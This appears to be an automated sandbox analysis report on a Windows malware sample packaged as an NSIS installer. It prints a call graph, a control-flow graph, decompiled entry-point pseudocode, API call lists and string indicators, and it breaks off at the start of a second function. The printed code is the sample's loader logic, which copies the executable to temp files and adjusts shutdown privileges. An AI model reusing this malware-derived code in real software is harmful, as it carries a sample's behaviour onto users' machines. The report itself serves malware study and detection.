21026->21031 21032 403e5d 21026->21032 21027->21026 21033 403f8c SetClassLongW 21028->21033 21030 404322 SendMessageW 21029->21030 21034 403f4c 21029->21034 21060 40400e 21030->21060 21031->21032 21035 403e65 DestroyWindow 21032->21035 21036 403e7f 21032->21036 21037 40140b 2 API calls 21033->21037 21039 404280 21035->21039 21040 403e84 SetWindowLongW 21036->21040 21041 403e95 21036->21041 21037->21025 21042 403fd4 21038->21042 21039->21034 21049 404290 ShowWindow 21039->21049 21040->21034 21045 403ea1 GetDlgItem 21041->21045 21046 403f3e 21041->21046 21042->21029 21047 403fd8 SendMessageW 21042->21047 21043 40140b 2 API calls 21043->21060 21044 404261 DestroyWindow EndDialog 21044->21039 21050 403ed1 21045->21050 21051 403eb4 SendMessageW IsWindowEnabled 21045->21051 21095 40433d 8 API calls 21046->21095 21047->21034 21049->21034 21053 403ede 21050->21053 21054 403f25 SendMessageW 21050->21054 21055 403ef1 21050->21055 21064 403ed6 21050->21064 21051->21034 21051->21050 21052 406234 18 API calls 21052->21060 21053->21054 21053->21064 21054->21046 21057 403ef9 21055->21057 21058 403f0e 21055->21058 21061 40140b 2 API calls 21057->21061 21062 40140b 2 API calls 21058->21062 21059 403f0c 21059->21046 21060->21034 21060->21043 21060->21044 21060->21052 21063 4042d6 19 API calls 21060->21063 21066 4042d6 19 API calls 21060->21066 21081 4041a1 DestroyWindow 21060->21081 21061->21064 21065 403f15 21062->21065 21063->21060 21094 4042af SendMessageW 21064->21094 21065->21046 21065->21064 21067 404089 GetDlgItem 21066->21067 21068 4040a6 ShowWindow KiUserCallbackDispatcher 21067->21068 21069 40409e 21067->21069 21091 4042f8 EnableWindow 21068->21091 21069->21068 21071 4040d0 EnableWindow 21074 4040e4 21071->21074 21072 4040e9 GetSystemMenu EnableMenuItem SendMessageW 21073 404119 SendMessageW 21072->21073 21072->21074 21073->21074 21074->21072 21092 40430b SendMessageW 21074->21092 21093 406212 lstrcpynW 21074->21093 21077 404147 lstrlenW 21078 406234 18 API calls 21077->21078 21079 40415d SetWindowTextW 21078->21079 21080 401389 2 API calls 21079->21080 21080->21060 21081->21039 21082 4041bb CreateDialogParamW 21081->21082 21082->21039 21083 4041ee 21082->21083 21084 4042d6 19 API calls 21083->21084 21085 4041f9 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 21084->21085 21086 401389 2 API calls 21085->21086 21087 40423f 21086->21087 21087->21034 21088 404247 ShowWindow 21087->21088 21089 404322 SendMessageW 21088->21089 21090 40425f 21089->21090 21090->21039 21091->21071 21092->21074 21093->21077 21094->21059 21095->21034 21453 4019ff 20 API calls 21105 100027c7 21106 10002817 21105->21106 21107 100027d7 VirtualProtect 21105->21107 21107->21106 21456 40258c 20 API calls 21553 401f8c 24 API calls 21125 40238e 21126 402393 21125->21126 21127 4023be 21125->21127 21148 402d5d 21126->21148 21128 402c53 18 API calls 21127->21128 21130 4023c5 21128->21130 21137 402c93 RegOpenKeyExW 21130->21137 21131 40239a 21132 4023a4 21131->21132 21136 4023db 21131->21136 21133 402c53 18 API calls 21132->21133 21135 4023ab RegDeleteValueW RegCloseKey 21133->21135 21135->21136 21138 402d27 21137->21138 21146 402cbe 21137->21146 21138->21136 21139 402ce4 RegEnumKeyW 21140 402cf6 RegCloseKey 21139->21140 21139->21146 21141 4065ec 5 API calls 21140->21141 21143 402d06 21141->21143 21142 402d1b RegCloseKey 21144 402d0a 21142->21144 21143->21144 21147 402d36 RegDeleteKeyW 21143->21147 21144->21138 21145 402c93 5 API calls 21145->21146 21146->21139 21146->21140 21146->21142 21146->21145 21147->21144 21149 402c53 18 API calls 21148->21149 21150 402d76 21149->21150 21151 402d84 RegOpenKeyExW 21150->21151 21151->21131 21457 402d98 SetTimer wsprintfW SetWindowTextW SetDlgItemTextW MulDiv 21204 4015a3 21205 402c53 18 API calls 21204->21205 21206 4015aa SetFileAttributesW 21205->21206 21207 4015bc 21206->21207 21461 4025ae 26 API calls 21347 401db3 GetDC 21348 402c31 18 API calls 21347->21348 21349 401dc5 GetDeviceCaps MulDiv ReleaseDC 21348->21349 21350 402c31 18 API calls 21349->21350 21351 401df6 21350->21351 21352 406234 18 API calls 21351->21352 21353 401e33 CreateFontIndirectW 21352->21353 21354 4025a8 21353->21354 21354->21354

                                                    Executed Functions

                                                    Function 0040344A Relevance: 91.4, APIs: 33, Strings: 19, Instructions: 401stringfilecomCOMMON
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
                                                    control_flow_graph 0 40344a-40347d SetErrorMode GetVersion 1 403490 0->1 2 40347f-403487 call 4065ec 0->2 4 403495-4034a9 call 40657c lstrlenA 1->4 2->1 7 403489 2->7 9 4034ab-40351f call 4065ec * 2 #17 OleInitialize SHGetFileInfoW call 406212 GetCommandLineW call 406212 GetModuleHandleW 4->9 7->1 18 403521-403528 9->18 19 403529-403543 call 405bf3 CharNextW 9->19 18->19 22 403549-40354f 19->22 23 40365a-403674 GetTempPathW call 403419 19->23 25 403551-403556 22->25 26 403558-40355c 22->26 32 403676-403694 GetWindowsDirectoryW lstrcatW call 403419 23->32 33 4036cc-4036e6 DeleteFileW call 402ed5 23->33 25->25 25->26 27 403563-403567 26->27 28 40355e-403562 26->28 30 403626-403633 call 405bf3 27->30 31 40356d-403573 27->31 28->27 46 403635-403636 30->46 47 403637-40363d 30->47 35 403575-40357d 31->35 36 40358e-4035c7 31->36 32->33 52 403696-4036c6 GetTempPathW lstrcatW SetEnvironmentVariableW * 2 call 403419 32->52 48 403797-4037a7 call 403969 OleUninitialize 33->48 49 4036ec-4036f2 33->49 40 403584 35->40 41 40357f-403582 35->41 42 4035e4-40361e 36->42 43 4035c9-4035ce 36->43 40->36 41->36 41->40 42->30 51 403620-403624 42->51 43->42 50 4035d0-4035d8 43->50 46->47 47->22 53 403643 47->53 69 4038cd-4038d3 48->69 70 4037ad-4037bd call 405957 ExitProcess 48->70 54 403787-40378e call 403a5b 49->54 55 4036f8-403703 call 405bf3 49->55 57 4035da-4035dd 50->57 58 4035df 50->58 51->30 59 403645-403653 call 406212 51->59 52->33 52->48 61 403658 53->61 68 403793 54->68 71 403751-40375b 55->71 72 403705-40373a 55->72 57->42 57->58 58->42 59->61 61->23 68->48 74 403951-403959 69->74 75 4038d5-4038eb GetCurrentProcess OpenProcessToken 69->75 81 4037c3-4037d7 call 4058da lstrcatW 71->81 82 40375d-40376b call 405cce 71->82 78 40373c-403740 72->78 79 40395b 74->79 80 40395f-403963 ExitProcess 74->80 76 403921-40392f call 4065ec 75->76 77 4038ed-40391b LookupPrivilegeValueW AdjustTokenPrivileges 75->77 95 403931-40393b 76->95 96 40393d-403948 ExitWindowsEx 76->96 77->76 85 403742-403747 78->85 86 403749-40374d 78->86 79->80 93 4037e4-4037fe lstrcatW lstrcmpiW 81->93 94 4037d9-4037df lstrcatW 81->94 82->48 97 40376d-403783 call 406212 * 2 82->97 85->86 90 40374f 85->90 86->78 86->90 90->71 93->48 99 403800-403803 93->99 94->93 95->96 100 40394a-40394c call 40140b 95->100 96->74 96->100 97->54 102 403805-40380a call 405840 99->102 103 40380c call 4058bd 99->103 100->74 111 403811-40381f SetCurrentDirectoryW 102->111 103->111 112 403821-403827 call 406212 111->112 113 40382c-403855 call 406212 111->113 112->113 117 40385a-403876 call 406234 DeleteFileW 113->117 120 4038b7-4038bf 117->120 121 403878-403888 CopyFileW 117->121 120->117 123 4038c1-4038c8 call 4060b3 120->123 121->120 122 40388a-4038aa call 4060b3 call 406234 call 4058f2 121->122 122->120 132 4038ac-4038b3 CloseHandle 122->132 123->48 132->120
                                                    C-Code - Quality: 82%
                                                    			_entry_() {
				intOrPtr _t54;
				WCHAR* _t58;
				char* _t61;
				void* _t64;
				void* _t66;
				int _t68;
				int _t70;
				int _t73;
				intOrPtr* _t74;
				int _t75;
				int _t77;
				void* _t101;
				signed int _t118;
				void* _t121;
				void* _t126;
				intOrPtr _t145;
				intOrPtr _t146;
				intOrPtr* _t147;
				int _t149;
				void* _t152;
				int _t153;
				signed int _t157;
				signed int _t162;
				signed int _t167;
				void* _t169;
				void* _t171;
				int* _t173;
				signed int _t179;
				signed int _t182;
				CHAR* _t183;
				WCHAR* _t184;
				void* _t190;
				char* _t191;
				void* _t194;
				void* _t195;
				void* _t238;

				_t169 = 0x20;
				_t149 = 0;
				 *(_t195 + 0x14) = 0;
				 *(_t195 + 0x10) = L"Error writing temporary file. Make sure your temp folder is valid.";
				 *(_t195 + 0x1c) = 0;
				SetErrorMode(0x8001); // executed
				if(GetVersion() != 6) {
					_t147 = E004065EC(0);
					if(_t147 != 0) {
						 *_t147(0xc00);
					}
				}
				_t183 = "UXTHEME";
				do {
					E0040657C(_t183); // executed
					_t183 =  &(_t183[lstrlenA(_t183) + 1]);
				} while ( *_t183 != 0);
				E004065EC(9);
				_t54 = E004065EC(7);
				 *0x42a244 = _t54;
				__imp__#17(_t190);
				__imp__OleInitialize(_t149); // executed
				 *0x42a2f8 = _t54;
				SHGetFileInfoW(0x4216e8, _t149, _t195 + 0x34, 0x2b4, _t149); // executed
				E00406212(0x429240, L"NSIS Error");
				_t58 = GetCommandLineW();
				_t191 = L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe\"";
				E00406212(_t191, _t58);
				 *0x42a240 = GetModuleHandleW(_t149);
				_t61 = _t191;
				if(L"\"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe\"" == 0x22) {
					_t61 =  &M00435002;
					_t169 = 0x22;
				}
				_t153 = CharNextW(E00405BF3(_t61, _t169));
				 *(_t195 + 0x18) = _t153;
				_t64 =  *_t153;
				if(_t64 == _t149) {
					L30:
					_t184 = L"C:\\Users\\Arthur\\AppData\\Local\\Temp\\";
					GetTempPathW(0x400, _t184);
					_t66 = E00403419(_t153, 0);
					_t220 = _t66;
					if(_t66 != 0) {
						L33:
						DeleteFileW(L"1033"); // executed
						_t68 = E00402ED5(_t222,  *(_t195 + 0x1c)); // executed
						 *(_t195 + 0x10) = _t68;
						if(_t68 != _t149) {
							L45:
							E00403969();
							__imp__OleUninitialize();
							_t234 =  *(_t195 + 0x10) - _t149;
							if( *(_t195 + 0x10) == _t149) {
								__eflags =  *0x42a2d4 - _t149;
								if( *0x42a2d4 == _t149) {
									L69:
									_t70 =  *0x42a2ec;
									__eflags = _t70 - 0xffffffff;
									if(_t70 != 0xffffffff) {
										 *(_t195 + 0x10) = _t70;
									}
									ExitProcess( *(_t195 + 0x10));
								}
								_t73 = OpenProcessToken(GetCurrentProcess(), 0x28, _t195 + 0x14);
								__eflags = _t73;
								if(_t73 != 0) {
									LookupPrivilegeValueW(_t149, L"SeShutdownPrivilege", _t195 + 0x20);
									 *(_t195 + 0x34) = 1;
									 *(_t195 + 0x40) = 2;
									AdjustTokenPrivileges( *(_t195 + 0x28), _t149, _t195 + 0x24, _t149, _t149, _t149);
								}
								_t74 = E004065EC(4);
								__eflags = _t74 - _t149;
								if(_t74 == _t149) {
									L67:
									_t75 = ExitWindowsEx(2, 0x80040002);
									__eflags = _t75;
									if(_t75 != 0) {
										goto L69;
									}
									goto L68;
								} else {
									_t77 =  *_t74(_t149, _t149, _t149, 0x25, 0x80040002);
									__eflags = _t77;
									if(_t77 == 0) {
										L68:
										E0040140B(9);
										goto L69;
									}
									goto L67;
								}
							}
							E00405957( *(_t195 + 0x10), 0x200010);
							ExitProcess(2);
						}
						if( *0x42a25c == _t149) {
							L44:
							 *0x42a2ec =  *0x42a2ec | 0xffffffff;
							 *(_t195 + 0x14) = E00403A5B( *0x42a2ec);
							goto L45;
						}
						_t173 = E00405BF3(_t191, _t149);
						if(_t173 < _t191) {
							L41:
							_t231 = _t173 - _t191;
							 *(_t195 + 0x10) = L"Error launching installer";
							if(_t173 < _t191) {
								_t171 = E004058DA(_t234);
								lstrcatW(_t184, L"~nsu");
								if(_t171 != _t149) {
									lstrcatW(_t184, "A");
								}
								lstrcatW(_t184, L".tmp");
								_t193 = L"C:\\Users\\Arthur\\Desktop";
								if(lstrcmpiW(_t184, L"C:\\Users\\Arthur\\Desktop") != 0) {
									_push(_t184);
									if(_t171 == _t149) {
										E004058BD();
									} else {
										E00405840();
									}
									SetCurrentDirectoryW(_t184);
									_t238 = L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93" - _t149; // 0x43
									if(_t238 == 0) {
										E00406212(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93", _t193);
									}
									E00406212(L"kernel32::EnumResourceTypesW(i 0,i r1,i 0)",  *(_t195 + 0x18));
									_t154 = "A" & 0x0000ffff;
									L"53608448" = ( *0x40a316 & 0x0000ffff) << 0x00000010 | "A" & 0x0000ffff;
									_t194 = 0x1a;
									do {
										E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x120)));
										DeleteFileW(0x420ee8);
										if( *(_t195 + 0x10) != _t149 && CopyFileW(L"C:\\Users\\Arthur\\Desktop\\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe", 0x420ee8, 1) != 0) {
											E004060B3(_t154, 0x420ee8, _t149);
											E00406234(_t149, 0x420ee8, _t184, 0x420ee8,  *((intOrPtr*)( *0x42a250 + 0x124)));
											_t101 = E004058F2(0x420ee8);
											if(_t101 != _t149) {
												CloseHandle(_t101);
												 *(_t195 + 0x10) = _t149;
											}
										}
										L"53608448" =  &(L"53608448"[0]);
										_t194 = _t194 - 1;
									} while (_t194 != 0);
									E004060B3(_t154, _t184, _t149);
								}
								goto L45;
							}
							 *_t173 = _t149;
							_t174 =  &(_t173[2]);
							if(E00405CCE(_t231,  &(_t173[2])) == 0) {
								goto L45;
							}
							E00406212(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93", _t174);
							E00406212(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93\\Vatersotiges\\Knoglemarvsundersgelsen\\Armoniac", _t174);
							 *(_t195 + 0x10) = _t149;
							goto L44;
						}
						asm("cdq");
						asm("cdq");
						asm("cdq");
						_t157 = ( *0x40a33a & 0x0000ffff) << 0x00000010 | L" _?=" & 0x0000ffff;
						_t118 = ( *0x40a33e & 0x0000ffff) << 0x00000010 |  *0x40a33c & 0x0000ffff | (_t162 << 0x00000020 |  *0x40a33e & 0x0000ffff) << 0x10;
						while( *_t173 != _t157 || _t173[1] != _t118) {
							_t173 = _t173;
							if(_t173 >= _t191) {
								continue;
							}
							break;
						}
						_t149 = 0;
						goto L41;
					}
					GetWindowsDirectoryW(_t184, 0x3fb);
					lstrcatW(_t184, L"\\Temp");
					_t121 = E00403419(_t153, _t220);
					_t221 = _t121;
					if(_t121 != 0) {
						goto L33;
					}
					GetTempPathW(0x3fc, _t184);
					lstrcatW(_t184, L"Low");
					SetEnvironmentVariableW(L"TEMP", _t184);
					SetEnvironmentVariableW(L"TMP", _t184);
					_t126 = E00403419(_t153, _t221);
					_t222 = _t126;
					if(_t126 == 0) {
						goto L45;
					}
					goto L33;
				} else {
					goto L8;
				}
				do {
					L8:
					_t152 = 0x20;
					if(_t64 != _t152) {
						L10:
						if( *_t153 == 0x22) {
							_t153 = _t153 + 2;
							_t152 = 0x22;
						}
						if( *_t153 != 0x2f) {
							goto L24;
						} else {
							_t153 = _t153 + 2;
							if( *_t153 == 0x53) {
								_t146 =  *((intOrPtr*)(_t153 + 2));
								if(_t146 == 0x20 || _t146 == 0) {
									 *0x42a2e0 = 1;
								}
							}
							asm("cdq");
							asm("cdq");
							_t167 = L"NCRC" & 0x0000ffff;
							asm("cdq");
							_t179 = ( *0x40a37e & 0x0000ffff) << 0x00000010 |  *0x40a37c & 0x0000ffff | _t167;
							if( *_t153 == (( *0x40a37a & 0x0000ffff) << 0x00000010 | _t167) &&  *((intOrPtr*)(_t153 + 4)) == _t179) {
								_t145 =  *((intOrPtr*)(_t153 + 8));
								if(_t145 == 0x20 || _t145 == 0) {
									 *(_t195 + 0x1c) =  *(_t195 + 0x1c) | 0x00000004;
								}
							}
							asm("cdq");
							asm("cdq");
							_t162 = L" /D=" & 0x0000ffff;
							asm("cdq");
							_t182 = ( *0x40a372 & 0x0000ffff) << 0x00000010 |  *0x40a370 & 0x0000ffff | _t162;
							if( *(_t153 - 4) != (( *0x40a36e & 0x0000ffff) << 0x00000010 | _t162) ||  *_t153 != _t182) {
								goto L24;
							} else {
								 *(_t153 - 4) =  *(_t153 - 4) & 0x00000000;
								__eflags = _t153;
								E00406212(L"C:\\Users\\Arthur\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Stempelpligtig93", _t153);
								L29:
								_t149 = 0;
								goto L30;
							}
						}
					} else {
						goto L9;
					}
					do {
						L9:
						_t153 = _t153 + 2;
					} while ( *_t153 == _t152);
					goto L10;
					L24:
					_t153 = E00405BF3(_t153, _t152);
					if( *_t153 == 0x22) {
						_t153 = _t153 + 2;
					}
					_t64 =  *_t153;
				} while (_t64 != 0);
				goto L29;
			}







































                                                    0x00403455
                                                    0x00403456
                                                    0x0040345d
                                                    0x00403461
                                                    0x00403469
                                                    0x0040346d
                                                    0x0040347d
                                                    0x00403480
                                                    0x00403487
                                                    0x0040348e
                                                    0x0040348e
                                                    0x00403487
                                                    0x00403490
                                                    0x00403495
                                                    0x00403496
                                                    0x004034a2
                                                    0x004034a6
                                                    0x004034ae
                                                    0x004034b5
                                                    0x004034ba
                                                    0x004034bf
                                                    0x004034c6
                                                    0x004034cc
                                                    0x004034e2
                                                    0x004034f2
                                                    0x004034f7
                                                    0x004034fd
                                                    0x00403504
                                                    0x00403518
                                                    0x0040351d
                                                    0x0040351f
                                                    0x00403523
                                                    0x00403528
                                                    0x00403528
                                                    0x00403537
                                                    0x00403539
                                                    0x0040353d
                                                    0x00403543
                                                    0x0040365a
                                                    0x00403660
                                                    0x0040366b
                                                    0x0040366d
                                                    0x00403672
                                                    0x00403674
                                                    0x004036cc
                                                    0x004036d1
                                                    0x004036db
                                                    0x004036e2
                                                    0x004036e6
                                                    0x00403797
                                                    0x00403797
                                                    0x0040379c
                                                    0x004037a2
                                                    0x004037a7
                                                    0x004038cd
                                                    0x004038d3
                                                    0x00403951
                                                    0x00403951
                                                    0x00403956
                                                    0x00403959
                                                    0x0040395b
                                                    0x0040395b
                                                    0x00403963
                                                    0x00403963
                                                    0x004038e3
                                                    0x004038e9
                                                    0x004038eb
                                                    0x004038f8
                                                    0x0040390b
                                                    0x00403913
                                                    0x0040391b
                                                    0x0040391b
                                                    0x00403923
                                                    0x00403928
                                                    0x0040392f
                                                    0x0040393d
                                                    0x00403940
                                                    0x00403946
                                                    0x00403948
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403931
                                                    0x00403937
                                                    0x00403939
                                                    0x0040393b
                                                    0x0040394a
                                                    0x0040394c
                                                    0x00000000
                                                    0x0040394c
                                                    0x00000000
                                                    0x0040393b
                                                    0x0040392f
                                                    0x004037b6
                                                    0x004037bd
                                                    0x004037bd
                                                    0x004036f2
                                                    0x00403787
                                                    0x00403787
                                                    0x00403793
                                                    0x00000000
                                                    0x00403793
                                                    0x004036ff
                                                    0x00403703
                                                    0x00403751
                                                    0x00403751
                                                    0x00403753
                                                    0x0040375b
                                                    0x004037ce
                                                    0x004037d0
                                                    0x004037d7
                                                    0x004037df
                                                    0x004037df
                                                    0x004037ea
                                                    0x004037ef
                                                    0x004037fe
                                                    0x00403802
                                                    0x00403803
                                                    0x0040380c
                                                    0x00403805
                                                    0x00403805
                                                    0x00403805
                                                    0x00403812
                                                    0x00403818
                                                    0x0040381f
                                                    0x00403827
                                                    0x00403827
                                                    0x00403835
                                                    0x00403841
                                                    0x0040384f
                                                    0x00403854
                                                    0x0040385a
                                                    0x00403866
                                                    0x0040386c
                                                    0x00403876
                                                    0x0040388c
                                                    0x0040389d
                                                    0x004038a3
                                                    0x004038aa
                                                    0x004038ad
                                                    0x004038b3
                                                    0x004038b3
                                                    0x004038aa
                                                    0x004038b7
                                                    0x004038be
                                                    0x004038be
                                                    0x004038c3
                                                    0x004038c3
                                                    0x00000000
                                                    0x004037fe
                                                    0x0040375d
                                                    0x00403760
                                                    0x0040376b
                                                    0x00000000
                                                    0x00000000
                                                    0x00403773
                                                    0x0040377e
                                                    0x00403783
                                                    0x00000000
                                                    0x00403783
                                                    0x0040370c
                                                    0x00403724
                                                    0x00403735
                                                    0x00403736
                                                    0x0040373a
                                                    0x0040373c
                                                    0x0040374a
                                                    0x0040374d
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x0040374d
                                                    0x0040374f
                                                    0x00000000
                                                    0x0040374f
                                                    0x0040367c
                                                    0x00403688
                                                    0x0040368d
                                                    0x00403692
                                                    0x00403694
                                                    0x00000000
                                                    0x00000000
                                                    0x0040369c
                                                    0x004036a4
                                                    0x004036b5
                                                    0x004036bd
                                                    0x004036bf
                                                    0x004036c4
                                                    0x004036c6
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403549
                                                    0x00403549
                                                    0x0040354b
                                                    0x0040354f
                                                    0x00403558
                                                    0x0040355c
                                                    0x00403561
                                                    0x00403562
                                                    0x00403562
                                                    0x00403567
                                                    0x00000000
                                                    0x0040356d
                                                    0x0040356e
                                                    0x00403573
                                                    0x00403575
                                                    0x0040357d
                                                    0x00403584
                                                    0x00403584
                                                    0x0040357d
                                                    0x00403595
                                                    0x004035a8
                                                    0x004035a9
                                                    0x004035be
                                                    0x004035c3
                                                    0x004035c7
                                                    0x004035d0
                                                    0x004035d8
                                                    0x004035df
                                                    0x004035df
                                                    0x004035d8
                                                    0x004035eb
                                                    0x004035fe
                                                    0x004035ff
                                                    0x00403614
                                                    0x0040361a
                                                    0x0040361e
                                                    0x00000000
                                                    0x00403645
                                                    0x00403645
                                                    0x0040364a
                                                    0x00403653
                                                    0x00403658
                                                    0x00403658
                                                    0x00000000
                                                    0x00403658
                                                    0x0040361e
                                                    0x00000000
                                                    0x00000000
                                                    0x00000000
                                                    0x00403551
                                                    0x00403551
                                                    0x00403552
                                                    0x00403553
                                                    0x00000000
                                                    0x00403626
                                                    0x0040362d
                                                    0x00403633
                                                    0x00403636
                                                    0x00403636
                                                    0x00403637
                                                    0x0040363a
                                                    0x00000000

                                                    APIs
                                                    • SetErrorMode.KERNELBASE ref: 0040346D
                                                    • GetVersion.KERNEL32 ref: 00403473
                                                    • lstrlenA.KERNEL32(UXTHEME,UXTHEME), ref: 0040349C
                                                    • #17.COMCTL32(00000007,00000009), ref: 004034BF
                                                    • OleInitialize.OLE32(00000000), ref: 004034C6
                                                    • SHGetFileInfoW.SHELL32(004216E8,00000000,?,000002B4,00000000), ref: 004034E2
                                                    • GetCommandLineW.KERNEL32(00429240,NSIS Error), ref: 004034F7
                                                    • GetModuleHandleW.KERNEL32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00000000), ref: 0040350A
                                                    • CharNextW.USER32(00000000,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00000020), ref: 00403531
                                                      • Part of subcall function 004065EC: GetModuleHandleA.KERNEL32(?,00000020,?,004034B3,00000009), ref: 004065FE
                                                      • Part of subcall function 004065EC: GetProcAddress.KERNEL32(00000000,?), ref: 00406619
                                                    • GetTempPathW.KERNEL32(00000400,C:\Users\user\AppData\Local\Temp\), ref: 0040366B
                                                    • GetWindowsDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,000003FB), ref: 0040367C
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,\Temp), ref: 00403688
                                                    • GetTempPathW.KERNEL32(000003FC,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,\Temp), ref: 0040369C
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,Low), ref: 004036A4
                                                    • SetEnvironmentVariableW.KERNEL32(TEMP,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,Low), ref: 004036B5
                                                    • SetEnvironmentVariableW.KERNEL32(TMP,C:\Users\user\AppData\Local\Temp\), ref: 004036BD
                                                    • DeleteFileW.KERNELBASE(1033), ref: 004036D1
                                                      • Part of subcall function 00406212: lstrcpynW.KERNEL32(?,?,00000400,004034F7,00429240,NSIS Error), ref: 0040621F
                                                    • OleUninitialize.OLE32(?), ref: 0040379C
                                                    • ExitProcess.KERNEL32 ref: 004037BD
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,~nsu), ref: 004037D0
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,0040A328), ref: 004037DF
                                                    • lstrcatW.KERNEL32(C:\Users\user\AppData\Local\Temp\,.tmp), ref: 004037EA
                                                    • lstrcmpiW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\Desktop,C:\Users\user\AppData\Local\Temp\,.tmp,C:\Users\user\AppData\Local\Temp\,~nsu,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe",00000000,?), ref: 004037F6
                                                    • SetCurrentDirectoryW.KERNEL32(C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\), ref: 00403812
                                                    • DeleteFileW.KERNEL32(00420EE8,00420EE8,?,kernel32::EnumResourceTypesW(i 0,i r1,i 0),?), ref: 0040386C
                                                    • CopyFileW.KERNEL32(C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe,00420EE8,00000001), ref: 00403880
                                                    • CloseHandle.KERNEL32(00000000,00420EE8,00420EE8,?,00420EE8,00000000), ref: 004038AD
                                                    • GetCurrentProcess.KERNEL32(00000028,?), ref: 004038DC
                                                    • OpenProcessToken.ADVAPI32(00000000), ref: 004038E3
                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,SeShutdownPrivilege,?), ref: 004038F8
                                                    • AdjustTokenPrivileges.ADVAPI32 ref: 0040391B
                                                    • ExitWindowsEx.USER32(00000002,80040002), ref: 00403940
                                                    • ExitProcess.KERNEL32 ref: 00403963
                                                    Strings
                                                    Memory Dump Source
                                                    • Source File: 00000001.00000002.39668944121.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                    • Associated: 00000001.00000002.39668910636.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669012668.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669057368.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669238341.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669280533.000000000042B000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669312568.000000000042D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669349693.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669430204.000000000046C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                    • Associated: 00000001.00000002.39669464054.000000000046E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                    Joe Sandbox IDA Plugin
                                                    • Snapshot File: hcaresult_1_2_400000_SecuriteInfo.jbxd
                                                    Similarity
                                                    • API ID: lstrcat$FileProcess$ExitHandle$CurrentDeleteDirectoryEnvironmentModulePathTempTokenVariableWindows$AddressAdjustCharCloseCommandCopyErrorInfoInitializeLineLookupModeNextOpenPrivilegePrivilegesProcUninitializeValueVersionlstrcmpilstrcpynlstrlen
                                                    • String ID: "C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe"$.tmp$1033$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93$C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Stempelpligtig93\Vatersotiges\Knoglemarvsundersgelsen\Armoniac$C:\Users\user\Desktop$C:\Users\user\Desktop\SecuriteInfo.com.Win32.Evo-gen.11060.2891.exe$Error launching installer$Error writing temporary file. Make sure your temp folder is valid.$Low$NSIS Error$SeShutdownPrivilege$TEMP$TMP$UXTHEME$\Temp$kernel32::EnumResourceTypesW(i 0,i r1,i 0)$~nsu
                                                    • API String ID: 2488574733-2213052478
                                                    • Opcode ID: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                    • Instruction ID: 1c098c9ac5d33f9e9f606ea88917c77842503da0397251e5f420d8b791505771
                                                    • Opcode Fuzzy Hash: 290ea68bc16bf9ba0967596cf016d677efff9e7d5fa8e06392f64e50e51ce68c
                                                    • Instruction Fuzzy Hash: 92D107B1200301ABD7207F659D49A3B3AACEB80709F51443FF881B62D1DB7D8952CB6E
                                                    Uniqueness

                                                    Uniqueness Score: -1.00%

                                                    Function 00404CED Relevance: 63.5, APIs: 33, Strings: 3, Instructions: 481windowmemoryCOMMONCrypto
                                                    Download Yara Rule

                                                    Control-flow Graph

                                                    • Executed
                                                    • Not Executed
